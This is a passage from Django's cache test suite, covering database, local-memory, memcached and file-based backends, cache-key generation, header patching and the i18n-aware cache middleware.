self.assertEqual(out.getvalue(), "Cache table 'test cache table' created.\n")
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter:
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def allow_migrate(self, db, app_label, **hints):
if app_label == 'django_cache':
return db == 'other'
return None
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
databases = {'default', 'other'}
@override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
def test_createcachetable_observes_database_router(self):
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable', database='default', verbosity=0)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable', database='other', verbosity=0)
class PicklingSideEffect:
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
self.locked = self.cache._lock.locked()
return {}
limit_locmem_entries = override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
OPTIONS={'MAX_ENTRIES': 9},
))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super().setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
self.assertIs(cache.add('add', bad_obj), True)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
self.assertEqual(cache.incr(key), 2)
self.assertEqual(expire, cache._expire_info[_key])
self.assertEqual(cache.decr(key), 1)
self.assertEqual(expire, cache._expire_info[_key])
@limit_locmem_entries
def test_lru_get(self):
"""get() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key)
cache.set(9, 9, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key)
for key in range(6, 9):
self.assertIsNone(cache.get(key))
self.assertEqual(cache.get(9), 9)
@limit_locmem_entries
def test_lru_set(self):
"""set() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(3, 9):
cache.set(key, key, timeout=None)
cache.set(9, 9, timeout=None)
for key in range(3, 10):
self.assertEqual(cache.get(key), key)
for key in range(3):
self.assertIsNone(cache.get(key))
@limit_locmem_entries
def test_lru_incr(self):
"""incr() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(6):
self.assertEqual(cache.incr(key), key + 1)
cache.set(9, 9, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key + 1)
for key in range(6, 9):
self.assertIsNone(cache.get(key))
self.assertEqual(cache.get(9), 9)
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
configured_caches = {}
for _cache_params in settings.CACHES.values():
configured_caches[_cache_params['BACKEND']] = _cache_params
PyLibMCCache_params = configured_caches.get('django.core.cache.backends.memcached.PyLibMCCache')
PyMemcacheCache_params = configured_caches.get('django.core.cache.backends.memcached.PyMemcacheCache')
# The memcached backends don't support cull-related options like `MAX_ENTRIES`.
memcached_excluded_caches = {'cull', 'zero_cull'}
class BaseMemcachedTests(BaseCacheTests):
# By default it's assumed that the client doesn't clean up connections
# properly, in which case the backend must do so after each request.
should_disconnect_on_close = True
def test_location_multiple_servers(self):
locations = [
['server1.tld', 'server2:11211'],
'server1.tld;server2:11211',
'server1.tld,server2:11211',
]
for location in locations:
with self.subTest(location=location):
params = {'BACKEND': self.base_params['BACKEND'], 'LOCATION': location}
with self.settings(CACHES={'default': params}):
self.assertEqual(cache._servers, ['server1.tld', 'server2:11211'])
def _perform_invalid_key_test(self, key, expected_warning):
"""
While other backends merely warn, memcached should raise for an invalid
key.
"""
msg = expected_warning.replace(key, cache.make_key(key))
tests = [
('add', [key, 1]),
('get', [key]),
('set', [key, 1]),
('incr', [key]),
('decr', [key]),
('touch', [key]),
('delete', [key]),
('get_many', [[key, 'b']]),
('set_many', [{key: 1, 'b': 2}]),
('delete_many', [{key: 1, 'b': 2}]),
]
for operation, args in tests:
with self.subTest(operation=operation):
with self.assertRaises(InvalidCacheKey) as cm:
getattr(cache, operation)(*args)
self.assertEqual(str(cm.exception), msg)
def test_default_never_expiring_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
TIMEOUT=None)):
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
def test_default_far_future_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
# 60*60*24*365, 1 year
TIMEOUT=31536000)):
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_memcached_deletes_key_on_failed_set(self):
# By default memcached allows objects up to 1MB. For the cache_db session
# backend to always use the current session, memcached needs to delete
# the old key if it fails to set.
max_value_length = 2 ** 20
cache.set('small_value', 'a')
self.assertEqual(cache.get('small_value'), 'a')
large_value = 'a' * (max_value_length + 1)
try:
cache.set('small_value', large_value)
except Exception:
# Most clients (e.g. pymemcache or pylibmc) raise when the value is
# too large. This test is primarily checking that the key was
# deleted, so the return/exception behavior for the set() itself is
# not important.
pass
# small_value should be deleted, or set if configured to accept larger values
value = cache.get('small_value')
self.assertTrue(value is None or value == large_value)
def test_close(self):
# For clients that don't manage their connections properly, the
# connection is closed when the request is complete.
signals.request_finished.disconnect(close_old_connections)
try:
with mock.patch.object(cache._class, 'disconnect_all', autospec=True) as mock_disconnect:
signals.request_finished.send(self.__class__)
self.assertIs(mock_disconnect.called, self.should_disconnect_on_close)
finally:
signals.request_finished.connect(close_old_connections)
def test_set_many_returns_failing_keys(self):
def fail_set_multi(mapping, *args, **kwargs):
return mapping.keys()
with mock.patch.object(cache._class, 'set_multi', side_effect=fail_set_multi):
failing_keys = cache.set_many({'key': 'value'})
self.assertEqual(failing_keys, ['key'])
# RemovedInDjango41Warning.
MemcachedCache_params = configured_caches.get('django.core.cache.backends.memcached.MemcachedCache')
@ignore_warnings(category=RemovedInDjango41Warning)
@unittest.skipUnless(MemcachedCache_params, "MemcachedCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=MemcachedCache_params,
exclude=memcached_excluded_caches,
))
class MemcachedCacheTests(BaseMemcachedTests, TestCase):
base_params = MemcachedCache_params
supports_get_with_default = False
incr_decr_type_error = ValueError
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key in settings.CACHES:
with self.subTest(cache_key=cache_key):
self.assertEqual(caches[cache_key]._cache.pickleProtocol, pickle.HIGHEST_PROTOCOL)
@override_settings(CACHES=caches_setting_for_tests(
base=MemcachedCache_params,
exclude=memcached_excluded_caches,
OPTIONS={'server_max_value_length': 9999},
))
def test_memcached_options(self):
self.assertEqual(cache._cache.server_max_value_length, 9999)
def test_default_used_when_none_is_set(self):
"""
python-memcached doesn't support default in get() so this test
overrides the one in BaseCacheTests.
"""
cache.set('key_default_none', None)
self.assertEqual(cache.get('key_default_none', default='default'), 'default')
class MemcachedCacheDeprecationTests(SimpleTestCase):
def test_warning(self):
from django.core.cache.backends.memcached import MemcachedCache
# Remove warnings filter on MemcachedCache deprecation warning, added
# in runtests.py.
warnings.filterwarnings(
'error',
'MemcachedCache is deprecated',
category=RemovedInDjango41Warning,
)
try:
msg = (
'MemcachedCache is deprecated in favor of PyMemcacheCache and '
'PyLibMCCache.'
)
with self.assertRaisesMessage(RemovedInDjango41Warning, msg):
MemcachedCache('127.0.0.1:11211', {})
finally:
warnings.filterwarnings(
'ignore',
'MemcachedCache is deprecated',
category=RemovedInDjango41Warning,
)
@unittest.skipUnless(PyLibMCCache_params, "PyLibMCCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
))
class PyLibMCCacheTests(BaseMemcachedTests, TestCase):
base_params = PyLibMCCache_params
# libmemcached manages its own connections.
should_disconnect_on_close = False
@property
def incr_decr_type_error(self):
return cache._lib.ClientError
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
OPTIONS={
'binary': True,
'behaviors': {'tcp_nodelay': True},
},
))
def test_pylibmc_options(self):
self.assertTrue(cache._cache.binary)
self.assertEqual(cache._cache.behaviors['tcp_nodelay'], int(True))
def test_pylibmc_client_servers(self):
backend = self.base_params['BACKEND']
tests = [
('unix:/run/memcached/socket', '/run/memcached/socket'),
('/run/memcached/socket', '/run/memcached/socket'),
('localhost', 'localhost'),
('localhost:11211', 'localhost:11211'),
('[::1]', '[::1]'),
('[::1]:11211', '[::1]:11211'),
('127.0.0.1', '127.0.0.1'),
('127.0.0.1:11211', '127.0.0.1:11211'),
]
for location, expected in tests:
settings = {'default': {'BACKEND': backend, 'LOCATION': location}}
with self.subTest(location), self.settings(CACHES=settings):
self.assertEqual(cache.client_servers, [expected])
@unittest.skipUnless(PyMemcacheCache_params, 'PyMemcacheCache backend not configured')
@override_settings(CACHES=caches_setting_for_tests(
base=PyMemcacheCache_params,
exclude=memcached_excluded_caches,
))
class PyMemcacheCacheTests(BaseMemcachedTests, TestCase):
base_params = PyMemcacheCache_params
@property
def incr_decr_type_error(self):
return cache._lib.exceptions.MemcacheClientError
def test_pymemcache_highest_pickle_version(self):
self.assertEqual(
cache._cache.default_kwargs['serde']._serialize_func.keywords['pickle_version'],
pickle.HIGHEST_PROTOCOL,
)
for cache_key in settings.CACHES:
for client_key, client in caches[cache_key]._cache.clients.items():
with self.subTest(cache_key=cache_key, server=client_key):
self.assertEqual(
client.serde._serialize_func.keywords['pickle_version'],
pickle.HIGHEST_PROTOCOL,
)
@override_settings(CACHES=caches_setting_for_tests(
base=PyMemcacheCache_params,
exclude=memcached_excluded_caches,
OPTIONS={'no_delay': True},
))
def test_pymemcache_options(self):
self.assertIs(cache._cache.default_kwargs['no_delay'], True)
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super().setUp()
self.dirname = self.mkdtemp()
# Caches location cannot be modified through override_settings / modify_settings,
# hence settings are manipulated directly here and the setting_changed signal
# is triggered manually.
for cache_params in settings.CACHES.values():
cache_params['LOCATION'] = self.dirname
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super().tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def mkdtemp(self):
return tempfile.mkdtemp()
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
self.assertTrue(os.path.exists(self.dirname))
def test_get_ignores_enoent(self):
cache.set('foo', 'bar')
os.unlink(cache._key_to_file('foo'))
# Returns the default instead of erroring.
self.assertEqual(cache.get('foo', 'baz'), 'baz')
@skipIf(
sys.platform == 'win32',
'Windows only partially supports umasks and chmod.',
)
def test_cache_dir_permissions(self):
os.rmdir(self.dirname)
dir_path = Path(self.dirname) / 'nested' / 'filebasedcache'
for cache_params in settings.CACHES.values():
cache_params['LOCATION'] = dir_path
setting_changed.send(self.__class__, setting='CACHES', enter=False)
cache.set('foo', 'bar')
self.assertIs(dir_path.exists(), True)
tests = [
dir_path,
dir_path.parent,
dir_path.parent.parent,
]
for directory in tests:
with self.subTest(directory=directory):
dir_mode = directory.stat().st_mode & 0o777
self.assertEqual(dir_mode, 0o700)
def test_get_does_not_ignore_non_filenotfound_exceptions(self):
with mock.patch('builtins.open', side_effect=OSError):
with self.assertRaises(OSError):
cache.get('foo')
def test_empty_cache_file_considered_expired(self):
cache_file = cache._key_to_file('foo')
with open(cache_file, 'wb') as fh:
fh.write(b'')
with open(cache_file, 'rb') as fh:
self.assertIs(cache._is_expired(fh), True)
class FileBasedCachePathLibTests(FileBasedCacheTests):
def mkdtemp(self):
tmp_dir = super().mkdtemp()
return Path(tmp_dir)
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(SimpleTestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class CacheClosingTests(SimpleTestCase):
def test_close(self):
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
def test_close_only_initialized(self):
with self.settings(CACHES={
'cache_1': {
'BACKEND': 'cache.closeable_cache.CacheClass',
},
'cache_2': {
'BACKEND': 'cache.closeable_cache.CacheClass',
},
}):
self.assertEqual(caches.all(initialized_only=True), [])
signals.request_finished.send(self.__class__)
self.assertEqual(caches.all(initialized_only=True), [])
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(SimpleTestCase):
"""
Settings having Cache arguments with a TIMEOUT=None create Caches that will
set non-expiring keys.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
del(self.DEFAULT_TIMEOUT)
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined in
django.core.cache.backends.base.BaseCache.__init__().
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
default settings with have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
ALLOWED_HOSTS=['.example.com'],
)
class CacheUtils(SimpleTestCase):
"""TestCase for django.utils.cache functions."""
host = 'www.example.com'
path = '/cache/test/'
factory = RequestFactory(HTTP_HOST=host)
def tearDown(self):
cache.clear()
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = update_cache if update_cache else True
return request
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('*', ('Accept-Language', 'Cookie'), '*'),
('Accept-Language, Cookie', ('*',), '*'),
)
for initial_vary, newheaders, resulting_vary in headers:
with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
response = HttpResponse()
if initial_vary is not None:
response.headers['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response.headers['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# A specified key_prefix is taken into account.
key_prefix = 'localprefix'
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# The querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response.headers['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, {'private'}),
('', {'private': True}, {'private'}),
# no-cache.
('', {'no_cache': 'Set-Cookie'}, {'no-cache=Set-Cookie'}),
('', {'no-cache': 'Set-Cookie'}, {'no-cache=Set-Cookie'}),
('no-cache=Set-Cookie', {'no_cache': True}, {'no-cache'}),
('no-cache=Set-Cookie,no-cache=Link', {'no_cache': True}, {'no-cache'}),
('no-cache=Set-Cookie', {'no_cache': 'Link'}, {'no-cache=Set-Cookie', 'no-cache=Link'}),
(
'no-cache=Set-Cookie,no-cache=Link',
{'no_cache': 'Custom'},
{'no-cache=Set-Cookie', 'no-cache=Link', 'no-cache=Custom'},
),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, {'private'}),
('private', {'public': True}, {'public'}),
('public', {'public': True}, {'public'}),
('public', {'private': True}, {'private'}),
('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
with self.subTest(initial_cc=initial_cc, newheaders=newheaders):
response = HttpResponse()
if initial_cc is not None:
response.headers['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response.headers['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(SimpleTestCase):
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
return UpdateCacheMiddleware(lambda req: HttpResponse(msg))(request)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=[
('en', 'English'),
('es', 'Spanish'),
],
)
class CacheI18nTest(SimpleTestCase):
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response.headers['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response.headers['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
tz = timezone.get_current_timezone_name()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = timezone.get_current_timezone_name()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
def get_response(req):
return HttpResponse(msg)
translation.activate(lang)
return UpdateCacheMiddleware(get_response)(request)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
content = 'Check for cache with QUERY_STRING'
def get_response(req):
return HttpResponse(content)
UpdateCacheMiddleware(get_response)(request)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
# The cache can be recovered
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, en_message.encode())
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change again the language
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change again the language
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNone(get_cache_data)
def get_stream_response(req):
return StreamingHttpResponse(['Check for cache with streaming content.'])
UpdateCacheMiddleware(get_stream_response)(request)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
